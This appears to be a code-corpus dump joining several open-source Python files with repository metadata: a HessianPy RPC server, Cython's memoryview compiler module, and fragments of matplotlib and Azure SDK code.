plot_savefig = plt.savefig
plot_xlabel = plt.xlabel
plot_ylabel = plt.ylabel
plot_title = plt.title
plot_xlim = plt.xlim
plot_ylim = plt.ylim
plot_set_xscale = plt.xscale
plot_set_yscale = plt.yscale
|
gpl-3.0
| 2,775,161,598,395,627,500
| 23.829545
| 74
| 0.684668
| false
| 3.901786
| false
| false
| false
|
PetrGlad/hessianpy
|
hessian/server.py
|
1
|
3978
|
#
# Hessian protocol implementation
# This file contains simple RPC server code.
#
# Protocol specification can be found here:
# http://www.caucho.com/resin-3.0/protocols/hessian-1.0-spec.xtp
#
# Copyright 2006-2007 Petr Gladkikh (batyi at users sourceforge net)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
import hessian
from StringIO import StringIO
import traceback
import socket
__revision__ = "$Rev$"
class HessianHTTPRequestHandler(BaseHTTPRequestHandler):
"""Subclasses should create clss's member message_map which maps method
names into function objects """
    MAX_CHUNK_SIZE = 2 ** 12
def do_POST(self):
try:
ctx = hessian.ParseContext(self.rfile)
(method, headers, params) = hessian.Call().read(ctx, ctx.read(1))
except Exception as e:
self.send_error(500, "Can not parse call request. Error: " + str(e))
return
if not self.message_map.has_key(method):
self.send_error(500, "Method '" + method + "' is not found")
return
succeeded = True
try:
result = self.message_map[method](*([self] + params))
except Exception as e:
stackTrace = traceback.format_exc()
succeeded = False
result = {"stackTrace" : stackTrace, "args" : e.args}
result.update(e.__dict__)
try:
sio = StringIO()
hessian.Reply().write(
hessian.WriteContext(sio),
(headers, succeeded, result))
reply = sio.getvalue()
except Exception:
stackTrace = traceback.format_exc()
# todo write this to logs
self.send_error(500, "Can not send response for '" + method + "'\n" + stackTrace)
return
self.send_response(200, "OK")
self.send_header("Content-type", "application/octet-stream")
self.send_header("Content-Length", str(len(reply)))
self.end_headers()
self.wfile.write(reply)
class ServerStoppedError(Exception):
pass
class StoppableHTTPServer(HTTPServer):
"""
Code adapted from Python CookBook
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/425210
"""
def server_bind(self):
HTTPServer.server_bind(self)
self.run = True
def get_request(self):
while self.run:
return self.socket.accept()
raise ServerStoppedError()
def stop(self):
self.run = False
def serve(self):
try:
while self.run:
self.handle_request()
except ServerStoppedError:
return
# ---------------------------------------------------------
# Server usage example
def hello():
return "Hello, from HessianPy!"
class TestHandler(HessianHTTPRequestHandler):
message_map = {"hello" : hello}
if __name__ == "__main__":
# Example code
print "Starting test server"
server_address = ('localhost', 9001)
httpd = StoppableHTTPServer(server_address, TestHandler)
print "Serving from ", server_address
httpd.serve()
import time
time.sleep(200)
httpd.stop()
print "Stopping test server"
|
apache-2.0
| 235,882,162,371,547,040
| 29.6
| 93
| 0.590749
| false
| 4.245464
| false
| false
| false
|
rguillebert/CythonCTypesBackend
|
Cython/Compiler/MemoryView.py
|
1
|
33248
|
from Errors import CompileError, error
import ExprNodes
from ExprNodes import IntNode, NameNode, AttributeNode
import Options
from Code import UtilityCode, TempitaUtilityCode
from UtilityCode import CythonUtilityCode
import Buffer
import PyrexTypes
import ModuleNode
START_ERR = "Start must not be given."
STOP_ERR = "Axis specification only allowed in the 'step' slot."
STEP_ERR = "Step must be omitted, 1, or a valid specifier."
BOTH_CF_ERR = "Cannot specify an array that is both C and Fortran contiguous."
INVALID_ERR = "Invalid axis specification."
NOT_CIMPORTED_ERR = "Variable was not cimported from cython.view"
EXPR_ERR = "no expressions allowed in axis spec, only names and literals."
CF_ERR = "Invalid axis specification for a C/Fortran contiguous array."
ERR_UNINITIALIZED = ("Cannot check if memoryview %s is initialized without the "
"GIL, consider using initializedcheck(False)")
def err_if_nogil_initialized_check(pos, env, name='variable'):
"This raises an exception at runtime now"
pass
#if env.nogil and env.directives['initializedcheck']:
#error(pos, ERR_UNINITIALIZED % name)
def concat_flags(*flags):
return "(%s)" % "|".join(flags)
format_flag = "PyBUF_FORMAT"
memview_c_contiguous = "(PyBUF_C_CONTIGUOUS | PyBUF_FORMAT | PyBUF_WRITABLE)"
memview_f_contiguous = "(PyBUF_F_CONTIGUOUS | PyBUF_FORMAT | PyBUF_WRITABLE)"
memview_any_contiguous = "(PyBUF_ANY_CONTIGUOUS | PyBUF_FORMAT | PyBUF_WRITABLE)"
memview_full_access = "PyBUF_FULL"
#memview_strided_access = "PyBUF_STRIDED"
memview_strided_access = "PyBUF_RECORDS"
MEMVIEW_DIRECT = '__Pyx_MEMVIEW_DIRECT'
MEMVIEW_PTR = '__Pyx_MEMVIEW_PTR'
MEMVIEW_FULL = '__Pyx_MEMVIEW_FULL'
MEMVIEW_CONTIG = '__Pyx_MEMVIEW_CONTIG'
MEMVIEW_STRIDED= '__Pyx_MEMVIEW_STRIDED'
MEMVIEW_FOLLOW = '__Pyx_MEMVIEW_FOLLOW'
_spec_to_const = {
'direct' : MEMVIEW_DIRECT,
'ptr' : MEMVIEW_PTR,
'full' : MEMVIEW_FULL,
'contig' : MEMVIEW_CONTIG,
'strided': MEMVIEW_STRIDED,
'follow' : MEMVIEW_FOLLOW,
}
_spec_to_abbrev = {
'direct' : 'd',
'ptr' : 'p',
'full' : 'f',
'contig' : 'c',
'strided' : 's',
'follow' : '_',
}
memslice_entry_init = "{ 0, 0, { 0 }, { 0 }, { 0 } }"
memview_name = u'memoryview'
memview_typeptr_cname = '__pyx_memoryview_type'
memview_objstruct_cname = '__pyx_memoryview_obj'
memviewslice_cname = u'__Pyx_memviewslice'
def put_init_entry(mv_cname, code):
code.putln("%s.data = NULL;" % mv_cname)
code.putln("%s.memview = NULL;" % mv_cname)
def mangle_dtype_name(dtype):
# a dumb wrapper for now; move Buffer.mangle_dtype_name in here later?
import Buffer
return Buffer.mangle_dtype_name(dtype)
#def axes_to_str(axes):
# return "".join([access[0].upper()+packing[0] for (access, packing) in axes])
def put_acquire_memoryviewslice(lhs_cname, lhs_type, lhs_pos, rhs, code,
have_gil=False, first_assignment=True):
"We can avoid decreffing the lhs if we know it is the first assignment"
assert rhs.type.is_memoryviewslice
pretty_rhs = isinstance(rhs, NameNode) or rhs.result_in_temp()
if pretty_rhs:
rhstmp = rhs.result()
else:
rhstmp = code.funcstate.allocate_temp(lhs_type, manage_ref=False)
code.putln("%s = %s;" % (rhstmp, rhs.result_as(lhs_type)))
# Allow uninitialized assignment
#code.putln(code.put_error_if_unbound(lhs_pos, rhs.entry))
put_assign_to_memviewslice(lhs_cname, rhs, rhstmp, lhs_type, code,
have_gil=have_gil, first_assignment=first_assignment)
if not pretty_rhs:
code.funcstate.release_temp(rhstmp)
def put_assign_to_memviewslice(lhs_cname, rhs, rhs_cname, memviewslicetype, code,
have_gil=False, first_assignment=False):
if not first_assignment:
code.put_xdecref_memoryviewslice(lhs_cname, have_gil=have_gil)
if rhs.is_name:
code.put_incref_memoryviewslice(rhs_cname, have_gil=have_gil)
code.putln("%s = %s;" % (lhs_cname, rhs_cname))
#code.putln("%s.memview = %s.memview;" % (lhs_cname, rhs_cname))
#code.putln("%s.data = %s.data;" % (lhs_cname, rhs_cname))
#for i in range(memviewslicetype.ndim):
# tup = (lhs_cname, i, rhs_cname, i)
# code.putln("%s.shape[%d] = %s.shape[%d];" % tup)
# code.putln("%s.strides[%d] = %s.strides[%d];" % tup)
# code.putln("%s.suboffsets[%d] = %s.suboffsets[%d];" % tup)
def get_buf_flags(specs):
is_c_contig, is_f_contig = is_cf_contig(specs)
if is_c_contig:
return memview_c_contiguous
elif is_f_contig:
return memview_f_contiguous
access, packing = zip(*specs)
if 'full' in access or 'ptr' in access:
return memview_full_access
else:
return memview_strided_access
def insert_newaxes(memoryviewtype, n):
axes = [('direct', 'strided')] * n
axes.extend(memoryviewtype.axes)
return PyrexTypes.MemoryViewSliceType(memoryviewtype.dtype, axes)
def broadcast_types(src, dst):
n = abs(src.ndim - dst.ndim)
if src.ndim < dst.ndim:
return insert_newaxes(src, n), dst
else:
return src, insert_newaxes(dst, n)
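# For example (illustrative): broadcasting a 2-dim slice against a 4-dim slice
# prepends two ('direct', 'strided') axes to the 2-dim type, so both operands
# end up with ndim == 4 before conformability is checked.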
def src_conforms_to_dst(src, dst, broadcast=False):
'''
returns True if src conforms to dst, False otherwise.
If conformable, the types are the same, the ndims are equal, and each axis spec is conformable.
Any packing/access spec is conformable to itself.
'direct' and 'ptr' are conformable to 'full'.
'contig' and 'follow' are conformable to 'strided'.
Any other combo is not conformable.
'''
if src.dtype != dst.dtype:
return False
if src.ndim != dst.ndim:
if broadcast:
src, dst = broadcast_types(src, dst)
else:
return False
for src_spec, dst_spec in zip(src.axes, dst.axes):
src_access, src_packing = src_spec
dst_access, dst_packing = dst_spec
if src_access != dst_access and dst_access != 'full':
return False
if src_packing != dst_packing and dst_packing != 'strided':
return False
return True
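# Illustrative axis-spec checks derived from the rules above:
# ('direct', 'contig') conforms to ('full', 'strided'), since 'full' accepts
# any access spec and 'strided' accepts any packing spec; ('ptr', 'contig')
# does not conform to ('direct', 'contig'), since the access specs differ and
# the destination access is not 'full'.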
def valid_memslice_dtype(dtype, i=0):
"""
Return whether type dtype can be used as the base type of a
memoryview slice.
We support structs, numeric types and objects
"""
if dtype.is_complex and dtype.real_type.is_int:
return False
if dtype.is_struct and dtype.kind == 'struct':
for member in dtype.scope.var_entries:
if not valid_memslice_dtype(member.type):
return False
return True
return (
dtype.is_error or
# Pointers are not valid (yet)
# (dtype.is_ptr and valid_memslice_dtype(dtype.base_type)) or
(dtype.is_array and i < 8 and
valid_memslice_dtype(dtype.base_type, i + 1)) or
dtype.is_numeric or
dtype.is_pyobject or
dtype.is_fused or # accept this as it will be replaced by specializations later
(dtype.is_typedef and valid_memslice_dtype(dtype.typedef_base_type))
)
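# Examples of the rule above (illustrative): a plain C int or a struct of
# floats is a valid memoryview base type; a complex type with integral real
# and imaginary parts is rejected, as are plain pointers.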
def validate_memslice_dtype(pos, dtype):
if not valid_memslice_dtype(dtype):
error(pos, "Invalid base type for memoryview slice: %s" % dtype)
class MemoryViewSliceBufferEntry(Buffer.BufferEntry):
def __init__(self, entry):
self.entry = entry
self.type = entry.type
self.cname = entry.cname
self.buf_ptr = "%s.data" % self.cname
dtype = self.entry.type.dtype
dtype = PyrexTypes.CPtrType(dtype)
self.buf_ptr_type = dtype
def get_buf_suboffsetvars(self):
return self._for_all_ndim("%s.suboffsets[%d]")
def get_buf_stridevars(self):
return self._for_all_ndim("%s.strides[%d]")
def get_buf_shapevars(self):
return self._for_all_ndim("%s.shape[%d]")
def generate_buffer_lookup_code(self, code, index_cnames):
axes = [(dim, index_cnames[dim], access, packing)
for dim, (access, packing) in enumerate(self.type.axes)]
return self._generate_buffer_lookup_code(code, axes)
def _generate_buffer_lookup_code(self, code, axes, cast_result=True):
bufp = self.buf_ptr
type_decl = self.type.dtype.declaration_code("")
for dim, index, access, packing in axes:
shape = "%s.shape[%d]" % (self.cname, dim)
stride = "%s.strides[%d]" % (self.cname, dim)
suboffset = "%s.suboffsets[%d]" % (self.cname, dim)
flag = get_memoryview_flag(access, packing)
if flag in ("generic", "generic_contiguous"):
# Note: we cannot do cast tricks to avoid stride multiplication
# for generic_contiguous, as we may have to do (dtype *)
# or (dtype **) arithmetic, we won't know which unless
# we check suboffsets
code.globalstate.use_utility_code(memviewslice_index_helpers)
bufp = ('__pyx_memviewslice_index_full(%s, %s, %s, %s)' %
(bufp, index, stride, suboffset))
elif flag == "indirect":
bufp = "(%s + %s * %s)" % (bufp, index, stride)
bufp = ("(*((char **) %s) + %s)" % (bufp, suboffset))
elif flag == "indirect_contiguous":
# Note: we do char ** arithmetic
bufp = "(*((char **) %s + %s) + %s)" % (bufp, index, suboffset)
elif flag == "strided":
bufp = "(%s + %s * %s)" % (bufp, index, stride)
else:
assert flag == 'contiguous', flag
bufp = '((char *) (((%s *) %s) + %s))' % (type_decl, bufp, index)
bufp = '( /* dim=%d */ %s )' % (dim, bufp)
if cast_result:
return "((%s *) %s)" % (type_decl, bufp)
return bufp
def generate_buffer_slice_code(self, code, indices, dst, have_gil,
have_slices):
"""
Slice a memoryviewslice.
indices - list of index nodes. If not a SliceNode, then it must be
coercible to Py_ssize_t
Simply call __pyx_memoryview_slice_memviewslice with the right
arguments.
"""
new_ndim = 0
src = self.cname
def load_slice_util(name, dict):
proto, impl = TempitaUtilityCode.load_as_string(
name, "MemoryView_C.c", context=dict)
return impl
all_dimensions_direct = True
for access, packing in self.type.axes:
if access != 'direct':
all_dimensions_direct = False
break
no_suboffset_dim = all_dimensions_direct and not have_slices
if not no_suboffset_dim:
suboffset_dim = code.funcstate.allocate_temp(
PyrexTypes.c_int_type, False)
code.putln("%s = -1;" % suboffset_dim)
code.putln("%(dst)s.data = %(src)s.data;" % locals())
code.putln("%(dst)s.memview = %(src)s.memview;" % locals())
code.put_incref_memoryviewslice(dst)
for dim, index in enumerate(indices):
error_goto = code.error_goto(index.pos)
if not isinstance(index, ExprNodes.SliceNode):
# normal index
idx = index.result()
access, packing = self.type.axes[dim]
if access == 'direct':
indirect = False
else:
indirect = True
generic = (access == 'full')
if new_ndim != 0:
return error(index.pos,
"All preceding dimensions must be "
"indexed and not sliced")
d = locals()
code.put(load_slice_util("SliceIndex", d))
else:
# slice, unspecified dimension, or part of ellipsis
d = locals()
for s in "start stop step".split():
idx = getattr(index, s)
have_idx = d['have_' + s] = not idx.is_none
if have_idx:
d[s] = idx.result()
else:
d[s] = "0"
if (not d['have_start'] and
not d['have_stop'] and
not d['have_step']):
# full slice (:), simply copy over the extent, stride
# and suboffset. Also update suboffset_dim if needed
access, packing = self.type.axes[dim]
d['access'] = access
code.put(load_slice_util("SimpleSlice", d))
else:
code.put(load_slice_util("ToughSlice", d))
new_ndim += 1
if not no_suboffset_dim:
code.funcstate.release_temp(suboffset_dim)
def empty_slice(pos):
none = ExprNodes.NoneNode(pos)
return ExprNodes.SliceNode(pos, start=none,
stop=none, step=none)
def unellipsify(indices, ndim):
result = []
seen_ellipsis = False
have_slices = False
for index in indices:
if isinstance(index, ExprNodes.EllipsisNode):
have_slices = True
full_slice = empty_slice(index.pos)
if seen_ellipsis:
result.append(full_slice)
else:
nslices = ndim - len(indices) + 1
result.extend([full_slice] * nslices)
seen_ellipsis = True
else:
have_slices = have_slices or isinstance(index, ExprNodes.SliceNode)
result.append(index)
if len(result) < ndim:
have_slices = True
nslices = ndim - len(result)
result.extend([empty_slice(indices[-1].pos)] * nslices)
return have_slices, result
def get_memoryview_flag(access, packing):
if access == 'full' and packing in ('strided', 'follow'):
return 'generic'
elif access == 'full' and packing == 'contig':
return 'generic_contiguous'
elif access == 'ptr' and packing in ('strided', 'follow'):
return 'indirect'
elif access == 'ptr' and packing == 'contig':
return 'indirect_contiguous'
elif access == 'direct' and packing in ('strided', 'follow'):
return 'strided'
else:
assert (access, packing) == ('direct', 'contig'), (access, packing)
return 'contiguous'
def get_is_contig_func_name(c_or_f, ndim):
return "__pyx_memviewslice_is_%s_contig%d" % (c_or_f, ndim)
def get_is_contig_utility(c_contig, ndim):
C = dict(context, ndim=ndim)
if c_contig:
utility = load_memview_c_utility("MemviewSliceIsCContig", C,
requires=[is_contig_utility])
else:
utility = load_memview_c_utility("MemviewSliceIsFContig", C,
requires=[is_contig_utility])
return utility
def copy_src_to_dst_cname():
return "__pyx_memoryview_copy_contents"
def verify_direct_dimensions(node):
for access, packing in node.type.axes:
if access != 'direct':
            error(node.pos, "All dimensions must be direct")
def copy_broadcast_memview_src_to_dst(src, dst, code):
"""
Copy the contents of slice src to slice dst. Does not support indirect
slices.
"""
verify_direct_dimensions(src)
verify_direct_dimensions(dst)
code.putln(code.error_goto_if_neg(
"%s(%s, %s, %d, %d, %d)" % (copy_src_to_dst_cname(),
src.result(), dst.result(),
src.type.ndim, dst.type.ndim,
dst.type.dtype.is_pyobject),
dst.pos))
def get_1d_fill_scalar_func(type, code):
dtype = type.dtype
type_decl = dtype.declaration_code("")
dtype_name = mangle_dtype_name(dtype)
context = dict(dtype_name=dtype_name, type_decl=type_decl)
utility = load_memview_c_utility("FillStrided1DScalar", context)
code.globalstate.use_utility_code(utility)
return '__pyx_fill_slice_%s' % dtype_name
def assign_scalar(dst, scalar, code):
"""
Assign a scalar to a slice. dst must be a temp, scalar will be assigned
to a correct type and not just something assignable.
"""
verify_direct_dimensions(dst)
dtype = dst.type.dtype
type_decl = dtype.declaration_code("")
slice_decl = dst.type.declaration_code("")
code.begin_block()
code.putln("%s __pyx_temp_scalar = %s;" % (type_decl, scalar.result()))
if dst.result_in_temp() or (dst.base.is_name and
isinstance(dst.index, ExprNodes.EllipsisNode)):
dst_temp = dst.result()
else:
code.putln("%s __pyx_temp_slice = %s;" % (slice_decl, dst.result()))
dst_temp = "__pyx_temp_slice"
# with slice_iter(dst.type, dst_temp, dst.type.ndim, code) as p:
slice_iter_obj = slice_iter(dst.type, dst_temp, dst.type.ndim, code)
p = slice_iter_obj.start_loops()
if dtype.is_pyobject:
code.putln("Py_DECREF(*(PyObject **) %s);" % p)
code.putln("*((%s *) %s) = __pyx_temp_scalar;" % (type_decl, p))
if dtype.is_pyobject:
code.putln("Py_INCREF(__pyx_temp_scalar);")
slice_iter_obj.end_loops()
code.end_block()
def slice_iter(slice_type, slice_temp, ndim, code):
if slice_type.is_c_contig or slice_type.is_f_contig:
return ContigSliceIter(slice_type, slice_temp, ndim, code)
else:
return StridedSliceIter(slice_type, slice_temp, ndim, code)
class SliceIter(object):
def __init__(self, slice_type, slice_temp, ndim, code):
self.slice_type = slice_type
self.slice_temp = slice_temp
self.code = code
self.ndim = ndim
class ContigSliceIter(SliceIter):
def start_loops(self):
code = self.code
code.begin_block()
type_decl = self.slice_type.dtype.declaration_code("")
total_size = ' * '.join("%s.shape[%d]" % (self.slice_temp, i)
for i in range(self.ndim))
code.putln("Py_ssize_t __pyx_temp_extent = %s;" % total_size)
code.putln("Py_ssize_t __pyx_temp_idx;")
code.putln("%s *__pyx_temp_pointer = (%s *) %s.data;" % (
type_decl, type_decl, self.slice_temp))
code.putln("for (__pyx_temp_idx = 0; "
"__pyx_temp_idx < __pyx_temp_extent; "
"__pyx_temp_idx++) {")
return "__pyx_temp_pointer"
def end_loops(self):
self.code.putln("__pyx_temp_pointer += 1;")
self.code.putln("}")
self.code.end_block()
class StridedSliceIter(SliceIter):
def start_loops(self):
code = self.code
code.begin_block()
for i in range(self.ndim):
t = i, self.slice_temp, i
code.putln("Py_ssize_t __pyx_temp_extent_%d = %s.shape[%d];" % t)
code.putln("Py_ssize_t __pyx_temp_stride_%d = %s.strides[%d];" % t)
code.putln("char *__pyx_temp_pointer_%d;" % i)
code.putln("Py_ssize_t __pyx_temp_idx_%d;" % i)
code.putln("__pyx_temp_pointer_0 = %s.data;" % self.slice_temp)
for i in range(self.ndim):
if i > 0:
code.putln("__pyx_temp_pointer_%d = __pyx_temp_pointer_%d;" % (i, i - 1))
code.putln("for (__pyx_temp_idx_%d = 0; "
"__pyx_temp_idx_%d < __pyx_temp_extent_%d; "
"__pyx_temp_idx_%d++) {" % (i, i, i, i))
return "__pyx_temp_pointer_%d" % (self.ndim - 1)
def end_loops(self):
code = self.code
for i in range(self.ndim - 1, -1, -1):
code.putln("__pyx_temp_pointer_%d += __pyx_temp_stride_%d;" % (i, i))
code.putln("}")
code.end_block()
def copy_c_or_fortran_cname(memview):
if memview.is_c_contig:
c_or_f = 'c'
else:
c_or_f = 'f'
return "__pyx_memoryview_copy_slice_%s_%s" % (
memview.specialization_suffix(), c_or_f)
def get_copy_new_utility(pos, from_memview, to_memview):
if from_memview.dtype != to_memview.dtype:
return error(pos, "dtypes must be the same!")
if len(from_memview.axes) != len(to_memview.axes):
return error(pos, "number of dimensions must be same")
if not (to_memview.is_c_contig or to_memview.is_f_contig):
return error(pos, "to_memview must be c or f contiguous.")
for (access, packing) in from_memview.axes:
if access != 'direct':
return error(
pos, "cannot handle 'full' or 'ptr' access at this time.")
if to_memview.is_c_contig:
mode = 'c'
contig_flag = memview_c_contiguous
elif to_memview.is_f_contig:
mode = 'fortran'
contig_flag = memview_f_contiguous
return load_memview_c_utility(
"CopyContentsUtility",
context=dict(
context,
mode=mode,
dtype_decl=to_memview.dtype.declaration_code(''),
contig_flag=contig_flag,
ndim=to_memview.ndim,
func_cname=copy_c_or_fortran_cname(to_memview),
dtype_is_object=int(to_memview.dtype.is_pyobject)),
requires=[copy_contents_new_utility])
def get_axes_specs(env, axes):
'''
get_axes_specs(env, axes) -> list of (access, packing) specs for each axis.
access is one of 'full', 'ptr' or 'direct'
packing is one of 'contig', 'strided' or 'follow'
'''
cythonscope = env.global_scope().context.cython_scope
cythonscope.load_cythonscope()
viewscope = cythonscope.viewscope
access_specs = tuple([viewscope.lookup(name)
for name in ('full', 'direct', 'ptr')])
packing_specs = tuple([viewscope.lookup(name)
for name in ('contig', 'strided', 'follow')])
is_f_contig, is_c_contig = False, False
default_access, default_packing = 'direct', 'strided'
cf_access, cf_packing = default_access, 'follow'
axes_specs = []
# analyse all axes.
for idx, axis in enumerate(axes):
if not axis.start.is_none:
raise CompileError(axis.start.pos, START_ERR)
if not axis.stop.is_none:
raise CompileError(axis.stop.pos, STOP_ERR)
if axis.step.is_none:
axes_specs.append((default_access, default_packing))
elif isinstance(axis.step, IntNode):
# the packing for the ::1 axis is contiguous,
# all others are cf_packing.
if axis.step.compile_time_value(env) != 1:
raise CompileError(axis.step.pos, STEP_ERR)
axes_specs.append((cf_access, 'cfcontig'))
elif isinstance(axis.step, (NameNode, AttributeNode)):
entry = _get_resolved_spec(env, axis.step)
if entry.name in view_constant_to_access_packing:
axes_specs.append(view_constant_to_access_packing[entry.name])
else:
                raise CompileError(axis.step.pos, INVALID_ERR)
else:
raise CompileError(axis.step.pos, INVALID_ERR)
# First, find out if we have a ::1 somewhere
contig_dim = 0
is_contig = False
for idx, (access, packing) in enumerate(axes_specs):
if packing == 'cfcontig':
if is_contig:
raise CompileError(axis.step.pos, BOTH_CF_ERR)
contig_dim = idx
axes_specs[idx] = (access, 'contig')
is_contig = True
if is_contig:
# We have a ::1 somewhere, see if we're C or Fortran contiguous
if contig_dim == len(axes) - 1:
is_c_contig = True
else:
is_f_contig = True
if contig_dim and not axes_specs[contig_dim - 1][0] in ('full', 'ptr'):
raise CompileError(axes[contig_dim].pos,
"Fortran contiguous specifier must follow an indirect dimension")
if is_c_contig:
# Contiguous in the last dimension, find the last indirect dimension
contig_dim = -1
for idx, (access, packing) in enumerate(reversed(axes_specs)):
if access in ('ptr', 'full'):
contig_dim = len(axes) - idx - 1
# Replace 'strided' with 'follow' for any dimension following the last
# indirect dimension, the first dimension or the dimension following
# the ::1.
# int[::indirect, ::1, :, :]
# ^ ^
# int[::indirect, :, :, ::1]
# ^ ^
start = contig_dim + 1
stop = len(axes) - is_c_contig
for idx, (access, packing) in enumerate(axes_specs[start:stop]):
idx = contig_dim + 1 + idx
if access != 'direct':
raise CompileError(axes[idx].pos,
"Indirect dimension may not follow "
"Fortran contiguous dimension")
if packing == 'contig':
raise CompileError(axes[idx].pos,
"Dimension may not be contiguous")
axes_specs[idx] = (access, cf_packing)
if is_c_contig:
# For C contiguity, we need to fix the 'contig' dimension
# after the loop
a, p = axes_specs[-1]
axes_specs[-1] = a, 'contig'
validate_axes_specs([axis.start.pos for axis in axes],
axes_specs,
is_c_contig,
is_f_contig)
return axes_specs
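# Worked example (illustrative): for a declaration like int[:, ::1] the code
# above yields [('direct', 'follow'), ('direct', 'contig')], i.e. a C
# contiguous 2-dim slice, while int[::1, :] yields the Fortran contiguous
# mirror [('direct', 'contig'), ('direct', 'follow')].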
def all(it):
for item in it:
if not item:
return False
return True
def is_cf_contig(specs):
is_c_contig = is_f_contig = False
if (len(specs) == 1 and specs == [('direct', 'contig')]):
is_c_contig = True
elif (specs[-1] == ('direct','contig') and
all([axis == ('direct','follow') for axis in specs[:-1]])):
# c_contiguous: 'follow', 'follow', ..., 'follow', 'contig'
is_c_contig = True
elif (len(specs) > 1 and
specs[0] == ('direct','contig') and
all([axis == ('direct','follow') for axis in specs[1:]])):
# f_contiguous: 'contig', 'follow', 'follow', ..., 'follow'
is_f_contig = True
return is_c_contig, is_f_contig
def get_mode(specs):
is_c_contig, is_f_contig = is_cf_contig(specs)
if is_c_contig:
return 'c'
elif is_f_contig:
return 'fortran'
for access, packing in specs:
if access in ('ptr', 'full'):
return 'full'
return 'strided'
view_constant_to_access_packing = {
'generic': ('full', 'strided'),
'strided': ('direct', 'strided'),
'indirect': ('ptr', 'strided'),
'generic_contiguous': ('full', 'contig'),
'contiguous': ('direct', 'contig'),
'indirect_contiguous': ('ptr', 'contig'),
}
def validate_axes_specs(positions, specs, is_c_contig, is_f_contig):
packing_specs = ('contig', 'strided', 'follow')
access_specs = ('direct', 'ptr', 'full')
# is_c_contig, is_f_contig = is_cf_contig(specs)
has_contig = has_follow = has_strided = has_generic_contig = False
last_indirect_dimension = -1
for idx, (access, packing) in enumerate(specs):
if access == 'ptr':
last_indirect_dimension = idx
for idx, pos, (access, packing) in zip(xrange(len(specs)), positions, specs):
if not (access in access_specs and
packing in packing_specs):
raise CompileError(pos, "Invalid axes specification.")
if packing == 'strided':
has_strided = True
elif packing == 'contig':
if has_contig:
raise CompileError(pos, "Only one direct contiguous "
"axis may be specified.")
valid_contig_dims = last_indirect_dimension + 1, len(specs) - 1
if idx not in valid_contig_dims and access != 'ptr':
if last_indirect_dimension + 1 != len(specs) - 1:
dims = "dimensions %d and %d" % valid_contig_dims
else:
dims = "dimension %d" % valid_contig_dims[0]
raise CompileError(pos, "Only %s may be contiguous and direct" % dims)
has_contig = access != 'ptr'
elif packing == 'follow':
if has_strided:
raise CompileError(pos, "A memoryview cannot have both follow and strided axis specifiers.")
if not (is_c_contig or is_f_contig):
raise CompileError(pos, "Invalid use of the follow specifier.")
if access in ('ptr', 'full'):
has_strided = False
def _get_resolved_spec(env, spec):
# spec must be a NameNode or an AttributeNode
if isinstance(spec, NameNode):
return _resolve_NameNode(env, spec)
elif isinstance(spec, AttributeNode):
return _resolve_AttributeNode(env, spec)
else:
raise CompileError(spec.pos, INVALID_ERR)
def _resolve_NameNode(env, node):
try:
resolved_name = env.lookup(node.name).name
except AttributeError:
raise CompileError(node.pos, INVALID_ERR)
viewscope = env.global_scope().context.cython_scope.viewscope
entry = viewscope.lookup(resolved_name)
if entry is None:
raise CompileError(node.pos, NOT_CIMPORTED_ERR)
return entry
def _resolve_AttributeNode(env, node):
path = []
while isinstance(node, AttributeNode):
path.insert(0, node.attribute)
node = node.obj
if isinstance(node, NameNode):
path.insert(0, node.name)
else:
raise CompileError(node.pos, EXPR_ERR)
modnames = path[:-1]
# must be at least 1 module name, o/w not an AttributeNode.
assert modnames
scope = env
for modname in modnames:
mod = scope.lookup(modname)
if not mod or not mod.as_module:
raise CompileError(
node.pos, "undeclared name not builtin: %s" % modname)
scope = mod.as_module
entry = scope.lookup(path[-1])
if not entry:
raise CompileError(node.pos, "No such attribute '%s'" % path[-1])
return entry
#
### Utility loading
#
def load_memview_cy_utility(util_code_name, context=None, **kwargs):
return CythonUtilityCode.load(util_code_name, "MemoryView.pyx",
context=context, **kwargs)
def load_memview_c_utility(util_code_name, context=None, **kwargs):
if context is None:
return UtilityCode.load(util_code_name, "MemoryView_C.c", **kwargs)
else:
return TempitaUtilityCode.load(util_code_name, "MemoryView_C.c",
context=context, **kwargs)
def use_cython_array_utility_code(env):
cython_scope = env.global_scope().context.cython_scope
cython_scope.load_cythonscope()
cython_scope.viewscope.lookup('array_cwrapper').used = True
context = {
'memview_struct_name': memview_objstruct_cname,
'max_dims': Options.buffer_max_dims,
'memviewslice_name': memviewslice_cname,
'memslice_init': memslice_entry_init,
}
memviewslice_declare_code = load_memview_c_utility(
"MemviewSliceStruct",
proto_block='utility_code_proto_before_types',
context=context)
atomic_utility = load_memview_c_utility("Atomics", context,
proto_block='utility_code_proto_before_types')
memviewslice_init_code = load_memview_c_utility(
"MemviewSliceInit",
context=dict(context, BUF_MAX_NDIMS=Options.buffer_max_dims),
requires=[memviewslice_declare_code,
Buffer.acquire_utility_code,
atomic_utility,
Buffer.typeinfo_compare_code],
)
memviewslice_index_helpers = load_memview_c_utility("MemviewSliceIndex")
typeinfo_to_format_code = load_memview_cy_utility(
"BufferFormatFromTypeInfo", requires=[Buffer._typeinfo_to_format_code])
is_contig_utility = load_memview_c_utility("MemviewSliceIsContig", context)
overlapping_utility = load_memview_c_utility("OverlappingSlices", context)
copy_contents_new_utility = load_memview_c_utility(
"MemviewSliceCopyTemplate",
context,
requires=[], # require cython_array_utility_code
)
view_utility_code = load_memview_cy_utility(
"View.MemoryView",
context=context,
requires=[Buffer.GetAndReleaseBufferUtilityCode(),
Buffer.buffer_struct_declare_code,
Buffer.empty_bufstruct_utility,
memviewslice_init_code,
is_contig_utility,
overlapping_utility,
copy_contents_new_utility,
ModuleNode.capsule_utility_code],
)
view_utility_whitelist = ('array', 'memoryview', 'array_cwrapper',
'generic', 'strided', 'indirect', 'contiguous',
'indirect_contiguous')
copy_contents_new_utility.requires.append(view_utility_code)
|
apache-2.0
| 9,080,627,596,111,706,000
| 34.598501
| 108
| 0.573749
| false
| 3.617845
| false
| false
| false
|
lmazuel/azure-sdk-for-python
|
azure-mgmt-network/azure/mgmt/network/v2017_03_01/models/topology_association.py
|
1
|
1586
|
# coding=utf-8
# --------------------------------------------------------------------------
